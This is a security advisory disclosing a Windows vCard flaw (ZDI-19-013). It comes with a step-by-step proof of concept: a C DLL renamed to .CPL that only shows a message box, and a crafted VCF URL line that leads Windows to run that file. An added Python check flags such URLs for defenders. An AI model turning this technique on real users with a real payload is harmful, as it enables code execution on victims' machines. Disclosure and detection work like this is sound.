[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
[Vendor]
www.microsoft.com
[Product]
A VCF file is a standard file format for storing contact information for a person or business.
Microsoft Outlook supports the vCard and vCalendar features. These are a powerful new approach to electronic Personal Data Interchange (PDI).
[Vulnerability Type]
Insufficient UI Warning Remote Code Execution
[CVE Reference]
ZDI-19-013
ZDI-CAN-6920
[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the processing of VCard files. Crafted data in a VCard file can cause Windows to display a dangerous hyperlink.
The user interface fails to provide any indication of the hazard.
An attacker can leverage this vulnerability to execute code in the context of the current user.
[Exploit/POC]
1) Create a directory and name it "http"; this will house the .CPL executable file.
2) Create a .CPL file and give it a website name. I named mine "www.hyp3rlinx.altervista.cpl",
or use whatever website you wish so it can be referenced in the VCF file.
#include <windows.h>
/* hyp3rlinx */
/*
gcc -c -m32 hyp3rlinx.altervista.c
gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o
*/
void ms_vcf_0day(){
    MessageBox( 0, "Continue with install?" , "TrickyDealC0der :)" , MB_YESNO + MB_ICONQUESTION );
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
    switch(fdwReason){
        case DLL_PROCESS_ATTACH:{
            ms_vcf_0day();
            break;
        }
        case DLL_PROCESS_DETACH:{
            ms_vcf_0day();
            break;
        }
        case DLL_THREAD_ATTACH:{
            ms_vcf_0day();
            break;
        }
        case DLL_THREAD_DETACH:{
            ms_vcf_0day();
            break;
        }
    }
    return TRUE;
}
3) Make sure to rename the executable's .DLL extension to a .CPL extension if you did not follow the compile instructions above to output as ".CPL".
e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl
4) Create a .VCF mail file. I named mine "trickyDealC0der.vcf".
For the URL in the .VCF mail file, specify a URL like...
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
The Windows .VCF File content:
"trickyDealC0der.vcf"
BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
TEL;TYPE="cell,home";PREF=1:tel:+000-000-0000
ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD
Now open the "trickyDealC0der.vcf" file and click the website link. The VCF file will traverse back one to the "http" directory where
our CPL executable file lives and KABOOM! :)
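Added example (not part of the original advisory or the author's PoC): a Python check a defender could run over received .vcf files to flag URL properties like the one above, i.e. values that are not plain http(s):// URLs, that contain backslashes, or that end in an executable extension. The function names and the extension list are assumptions made for this example, and the parser is simplified (it splits each line at the first colon).

```python
import re

# Assumption: illustrative list of extensions the Windows shell will execute; not exhaustive.
RISKY_EXT = (".cpl", ".exe", ".dll", ".scr", ".bat", ".cmd", ".lnk", ".hta", ".js", ".vbs")
WEB_URL = re.compile(r"^https?://[^\s\\]+$", re.IGNORECASE)


def unfold(text):
    """Undo vCard line folding: a line break followed by space/tab continues the line."""
    return re.sub(r"\r?\n[ \t]", "", text).splitlines()


def suspicious_urls(vcf_text):
    """Return (value, reasons) for every URL property that is not a plain web URL."""
    findings = []
    for line in unfold(vcf_text):
        name_params, sep, value = line.partition(":")
        # Property name precedes the first ';' and may carry a "group." prefix.
        prop = name_params.split(";", 1)[0].rsplit(".", 1)[-1].upper()
        value = value.strip()
        if not sep or prop != "URL" or WEB_URL.match(value):
            continue
        reasons = ["no http(s):// scheme, so the shell may treat it as a path"]
        if "\\" in value:
            reasons.append("contains a backslash (local or UNC path)")
        if value.lower().endswith(RISKY_EXT):
            reasons.append("ends with an executable extension")
        findings.append((value, reasons))
    return findings


# Constructed sample: the URL line from the advisory next to a benign one.
SAMPLE = (
    "BEGIN:VCARD\r\nVERSION:4.0\r\nFN:TrickyDealC0der\r\n"
    "URL;TYPE=home;PREF=1:http.\\\\www.hyp3rlinx.altervista.cpl\r\n"
    "URL;TYPE=work:https://www.example.com/about\r\n"
    "END:VCARD\r\n"
)

if __name__ == "__main__":
    for value, reasons in suspicious_urls(SAMPLE):
        print(value, "->", "; ".join(reasons))
```
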
[References]
https://www.zerodayinitiative.com/advisories/ZDI-19-013/
[Network Access]
Remote
[POC Video URL]
https://vimeo.com/310684003